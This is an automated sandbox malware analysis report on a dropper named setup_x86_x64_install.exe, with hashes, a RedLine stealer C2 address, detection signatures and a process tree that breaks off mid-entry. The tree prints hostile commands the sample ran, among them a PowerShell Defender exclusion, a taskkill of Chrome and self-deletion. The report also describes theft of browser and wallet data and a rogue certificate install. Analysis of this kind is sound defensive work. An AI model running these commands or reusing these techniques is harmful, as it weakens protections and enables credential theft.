Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
11-10-2021 20:45
211011-zjxjlsabbm 1011-10-2021 13:10
211011-qegsxshcfp 1011-10-2021 10:55
211011-mz7y3ahaak 1010-10-2021 19:24
211010-x4mtssgae2 10Analysis
-
max time kernel
1786s -
max time network
1809s -
platform
windows7_x64 -
resource
win7-de-20210920 -
submitted
11-10-2021 10:55
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral3/memory/2032-191-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2032-192-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2032-193-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2032-194-0x000000000041B23A-mapping.dmp family_redline behavioral3/memory/2032-197-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Socelars Payload 5 IoCs
resource yara_rule behavioral3/files/0x0005000000013271-104.dat family_socelars behavioral3/files/0x0005000000013271-126.dat family_socelars behavioral3/files/0x0005000000013271-136.dat family_socelars behavioral3/files/0x0005000000013271-173.dat family_socelars behavioral3/files/0x0005000000013271-172.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
resource yara_rule behavioral3/files/0x0005000000013066-70.dat aspack_v212_v242 behavioral3/files/0x0005000000013066-71.dat aspack_v212_v242 behavioral3/files/0x000600000001267c-72.dat aspack_v212_v242 behavioral3/files/0x000600000001267c-73.dat aspack_v212_v242 behavioral3/files/0x00050000000130d5-76.dat aspack_v212_v242 behavioral3/files/0x00050000000130d5-77.dat aspack_v212_v242 -
Executes dropped EXE 19 IoCs
pid Process 776 setup_installer.exe 1408 setup_install.exe 1592 Sun15dbd675f871ca.exe 708 Sun15901f2f025e.exe 904 Sun152bab5a2de.exe 780 Sun1577c3e159a3e3815.exe 1816 Sun15f67075f27a2b5b.exe 1672 Sun159ff1acacf.exe 908 Sun15f1b1f8c669.exe 584 Sun152bea652bd7232.exe 1436 Sun158d8ef840.exe 2032 Sun159ff1acacf.exe 304 1410332.scr 840 6434229.scr 1448 09xU.exE 2084 6668028.scr 2168 2285000.scr 2420 WinHoster.exe 2644 Sun152e52d07b74d9b5.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6668028.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6668028.scr -
Loads dropped DLL 51 IoCs
pid Process 1796 setup_x86_x64_install.exe 776 setup_installer.exe 776 setup_installer.exe 776 setup_installer.exe 776 setup_installer.exe 776 setup_installer.exe 776 setup_installer.exe 1408 setup_install.exe 1408 setup_install.exe 1408 setup_install.exe 1408 setup_install.exe 1408 setup_install.exe 1408 setup_install.exe 1408 setup_install.exe 1408 setup_install.exe 292 cmd.exe 292 cmd.exe 1440 cmd.exe 532 cmd.exe 1012 cmd.exe 976 cmd.exe 976 cmd.exe 1936 cmd.exe 1248 cmd.exe 1248 cmd.exe 1672 Sun159ff1acacf.exe 1672 Sun159ff1acacf.exe 916 cmd.exe 692 cmd.exe 708 Sun15901f2f025e.exe 708 Sun15901f2f025e.exe 1436 Sun158d8ef840.exe 1436 Sun158d8ef840.exe 1672 Sun159ff1acacf.exe 2032 Sun159ff1acacf.exe 2032 Sun159ff1acacf.exe 780 Sun1577c3e159a3e3815.exe 780 Sun1577c3e159a3e3815.exe 1324 cmd.exe 1448 09xU.exE 1448 09xU.exE 840 6434229.scr 2420 WinHoster.exe 2420 WinHoster.exe 688 cmd.exe 2976 rundll32.exe 2976 rundll32.exe 2976 rundll32.exe 800 rundll32.exe 800 rundll32.exe 800 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral3/memory/2084-226-0x0000000000BE0000-0x0000000000BE1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6434229.scr -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6668028.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2084 6668028.scr -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1672 set thread context of 2032 1672 Sun159ff1acacf.exe 57 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1760 2644 WerFault.exe 78 -
Kills process with taskkill 3 IoCs
pid Process 2936 taskkill.exe 1884 taskkill.exe 2280 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun15f67075f27a2b5b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun15f67075f27a2b5b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun15f67075f27a2b5b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun15f67075f27a2b5b.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2084 6668028.scr 304 1410332.scr 2168 2285000.scr 2168 2285000.scr 304 1410332.scr 1880 powershell.exe 1760 WerFault.exe 1760 WerFault.exe 1760 WerFault.exe 1760 WerFault.exe 1760 WerFault.exe 1760 WerFault.exe 1760 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1760 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeCreateTokenPrivilege 708 Sun15901f2f025e.exe Token: SeAssignPrimaryTokenPrivilege 708 Sun15901f2f025e.exe Token: SeLockMemoryPrivilege 708 Sun15901f2f025e.exe Token: SeIncreaseQuotaPrivilege 708 Sun15901f2f025e.exe Token: SeMachineAccountPrivilege 708 Sun15901f2f025e.exe Token: SeTcbPrivilege 708 Sun15901f2f025e.exe Token: SeSecurityPrivilege 708 Sun15901f2f025e.exe Token: SeTakeOwnershipPrivilege 708 Sun15901f2f025e.exe Token: SeLoadDriverPrivilege 708 Sun15901f2f025e.exe Token: SeSystemProfilePrivilege 708 Sun15901f2f025e.exe Token: SeSystemtimePrivilege 708 Sun15901f2f025e.exe Token: SeProfSingleProcessPrivilege 708 Sun15901f2f025e.exe Token: SeIncBasePriorityPrivilege 708 Sun15901f2f025e.exe Token: SeCreatePagefilePrivilege 708 Sun15901f2f025e.exe Token: SeCreatePermanentPrivilege 708 Sun15901f2f025e.exe Token: SeBackupPrivilege 708 Sun15901f2f025e.exe Token: SeRestorePrivilege 708 Sun15901f2f025e.exe Token: SeShutdownPrivilege 708 Sun15901f2f025e.exe Token: SeDebugPrivilege 708 Sun15901f2f025e.exe Token: SeAuditPrivilege 708 Sun15901f2f025e.exe Token: SeSystemEnvironmentPrivilege 708 Sun15901f2f025e.exe Token: SeChangeNotifyPrivilege 708 Sun15901f2f025e.exe Token: SeRemoteShutdownPrivilege 708 Sun15901f2f025e.exe Token: SeUndockPrivilege 708 Sun15901f2f025e.exe Token: SeSyncAgentPrivilege 708 Sun15901f2f025e.exe Token: SeEnableDelegationPrivilege 708 Sun15901f2f025e.exe Token: SeManageVolumePrivilege 708 Sun15901f2f025e.exe Token: SeImpersonatePrivilege 708 Sun15901f2f025e.exe Token: SeCreateGlobalPrivilege 708 Sun15901f2f025e.exe Token: 31 708 Sun15901f2f025e.exe Token: 32 708 Sun15901f2f025e.exe Token: 33 708 Sun15901f2f025e.exe Token: 34 708 Sun15901f2f025e.exe Token: 35 708 Sun15901f2f025e.exe Token: SeDebugPrivilege 1816 Sun15f67075f27a2b5b.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 304 1410332.scr Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 2168 2285000.scr Token: SeDebugPrivilege 2644 Sun152e52d07b74d9b5.exe Token: SeDebugPrivilege 2936 taskkill.exe Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 1760 WerFault.exe Token: SeDebugPrivilege 2032 Sun159ff1acacf.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1796 wrote to memory of 776 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 776 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 776 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 776 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 776 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 776 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 776 1796 setup_x86_x64_install.exe 28 PID 776 wrote to memory of 1408 776 setup_installer.exe 29 PID 776 wrote to memory of 1408 776 setup_installer.exe 29 PID 776 wrote to memory of 1408 776 setup_installer.exe 29 PID 776 wrote to memory of 1408 776 setup_installer.exe 29 PID 776 wrote to memory of 1408 776 setup_installer.exe 29 PID 776 wrote to memory of 1408 776 setup_installer.exe 29 PID 776 wrote to memory of 1408 776 setup_installer.exe 29 PID 1408 wrote to memory of 1088 1408 setup_install.exe 31 PID 1408 wrote to memory of 1088 1408 setup_install.exe 31 PID 1408 wrote to memory of 1088 1408 setup_install.exe 31 PID 1408 wrote to memory of 1088 1408 setup_install.exe 31 PID 1408 wrote to memory of 1088 1408 setup_install.exe 31 PID 1408 wrote to memory of 1088 1408 setup_install.exe 31 PID 1408 wrote to memory of 1088 1408 setup_install.exe 31 PID 1408 wrote to memory of 532 1408 setup_install.exe 32 PID 1408 wrote to memory of 532 1408 setup_install.exe 32 PID 1408 wrote to memory of 532 1408 setup_install.exe 32 PID 1408 wrote to memory of 532 1408 setup_install.exe 32 PID 1408 wrote to memory of 532 1408 setup_install.exe 32 PID 1408 wrote to memory of 532 1408 setup_install.exe 32 PID 1408 wrote to memory of 532 1408 setup_install.exe 32 PID 1408 wrote to memory of 1012 1408 setup_install.exe 33 PID 1408 wrote to memory of 1012 1408 setup_install.exe 33 PID 1408 wrote to memory of 1012 1408 setup_install.exe 33 PID 1408 wrote to memory of 1012 1408 setup_install.exe 33 PID 1408 wrote to memory of 1012 1408 setup_install.exe 33 PID 1408 wrote to memory of 1012 1408 setup_install.exe 33 PID 1408 wrote to memory of 1012 1408 setup_install.exe 33 PID 1408 wrote to memory of 1440 1408 setup_install.exe 34 PID 1408 wrote to memory of 1440 1408 setup_install.exe 34 PID 1408 wrote to memory of 1440 1408 setup_install.exe 34 PID 1408 wrote to memory of 1440 1408 setup_install.exe 34 PID 1408 wrote to memory of 1440 1408 setup_install.exe 34 PID 1408 wrote to memory of 1440 1408 setup_install.exe 34 PID 1408 wrote to memory of 1440 1408 setup_install.exe 34 PID 1408 wrote to memory of 1936 1408 setup_install.exe 35 PID 1408 wrote to memory of 1936 1408 setup_install.exe 35 PID 1408 wrote to memory of 1936 1408 setup_install.exe 35 PID 1408 wrote to memory of 1936 1408 setup_install.exe 35 PID 1408 wrote to memory of 1936 1408 setup_install.exe 35 PID 1408 wrote to memory of 1936 1408 setup_install.exe 35 PID 1408 wrote to memory of 1936 1408 setup_install.exe 35 PID 1408 wrote to memory of 292 1408 setup_install.exe 36 PID 1408 wrote to memory of 292 1408 setup_install.exe 36 PID 1408 wrote to memory of 292 1408 setup_install.exe 36 PID 1408 wrote to memory of 292 1408 setup_install.exe 36 PID 1408 wrote to memory of 292 1408 setup_install.exe 36 PID 1408 wrote to memory of 292 1408 setup_install.exe 36 PID 1408 wrote to memory of 292 1408 setup_install.exe 36 PID 1408 wrote to memory of 976 1408 setup_install.exe 37 PID 1408 wrote to memory of 976 1408 setup_install.exe 37 PID 1408 wrote to memory of 976 1408 setup_install.exe 37 PID 1408 wrote to memory of 976 1408 setup_install.exe 37 PID 1408 wrote to memory of 976 1408 setup_install.exe 37 PID 1408 wrote to memory of 976 1408 setup_install.exe 37 PID 1408 wrote to memory of 976 1408 setup_install.exe 37 PID 292 wrote to memory of 780 292 cmd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS803DB626\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe4⤵
- Loads dropped DLL
PID:532 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun152bab5a2de.exeSun152bab5a2de.exe5⤵
- Executes dropped EXE
PID:904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe4⤵
- Loads dropped DLL
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun15901f2f025e.exeSun15901f2f025e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:708 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe4⤵
- Loads dropped DLL
PID:1440 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun15dbd675f871ca.exeSun15dbd675f871ca.exe5⤵
- Executes dropped EXE
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe4⤵
- Loads dropped DLL
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun15f67075f27a2b5b.exeSun15f67075f27a2b5b.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\Users\Admin\AppData\Roaming\1410332.scr"C:\Users\Admin\AppData\Roaming\1410332.scr" /S6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Users\Admin\AppData\Roaming\6434229.scr"C:\Users\Admin\AppData\Roaming\6434229.scr" /S6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:840 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2420
-
-
-
C:\Users\Admin\AppData\Roaming\6668028.scr"C:\Users\Admin\AppData\Roaming\6668028.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2084
-
-
C:\Users\Admin\AppData\Roaming\2285000.scr"C:\Users\Admin\AppData\Roaming\2285000.scr" /S6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:292 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun1577c3e159a3e3815.exeSun1577c3e159a3e3815.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1577c3e159a3e3815.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun1577c3e159a3e3815.exe" & exit6⤵PID:2820
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun1577c3e159a3e3815.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe4⤵
- Loads dropped DLL
PID:976 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun15f1b1f8c669.exeSun15f1b1f8c669.exe5⤵
- Executes dropped EXE
PID:908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe4⤵
- Loads dropped DLL
PID:916 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun152bea652bd7232.exeSun152bea652bd7232.exe5⤵
- Executes dropped EXE
PID:584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun158d8ef840.exe4⤵
- Loads dropped DLL
PID:692 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun158d8ef840.exeSun158d8ef840.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1436 -
